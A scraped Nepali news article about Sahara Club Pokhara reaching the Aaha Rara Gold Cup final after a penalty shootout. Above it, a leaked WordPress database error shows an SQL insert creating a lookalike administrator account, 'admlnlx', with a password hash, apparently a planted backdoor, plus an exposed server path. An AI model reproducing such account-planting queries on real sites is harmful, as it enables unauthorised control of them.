WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bvb8oJ8.jGiz1mFzP.DMnEi.pjmzAu1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 07:01:05', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
आहा रारा गोल्डकपः आयोजक सहारा फाइनलमा – Gaule Khabar

आहा रारा गोल्डकपः आयोजक सहारा फाइनलमा

आहा रारा गोल्डकपः आयोजक सहारा फाइनलमा

पोखरा, माघ १२–

पोखरा रङ्गशालामा जारी १५ औं संस्करणको आहा रारा गोल्डकप फुटबल प्रतियोगितामा आयोजक सहारा क्लव पोखरा फाइनलमा प्रवेश गरेको छ ।

आज भएको पहिलो सेमीफाईनलमा सहाराले ४–३ गोलको अन्तरले विभागीय टिम त्रिभुवन आर्मी क्लवलाई पराजित गरेको हो ।

निर्धारित एवम् अतिरिक्त समयमा दुवै टिमबाट गोल हुन नसकेपछि खेला ट्राइबेकर धकेलिएको थियो । सहारा क्लव पोखराका तर्फबाट सुसन गुरुङ, शिव सुवेदी, प्रदीप गुरुङ र कप्तान उत्तम गुरुङले गोल गरेका थिए भने लक्ष्मण जिसीले प्रहार गरेको पेनाल्टी आर्मीका गोलरक्षक विकास कुथुले छेकेका थिए ।

प्रतियोगतामा त्रिभुवन आर्मी क्लवका तर्फबाट जितेन्द्र कार्की, सन्तोष तामाङ र दीपकुमार लामा गोल गर्न सफल भए । दीपक गुरुङ र गोलरक्षक विकास कुथुले गोल गर्न नसकेपछि आर्मीले हार बेहोर्न बाध्य भयो ।

भोलि दोस्रो सेमिफाइनल खेल मनाङ मस्र्याङदी क्लव र सङ्कटा क्लवबीच हुनेछ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका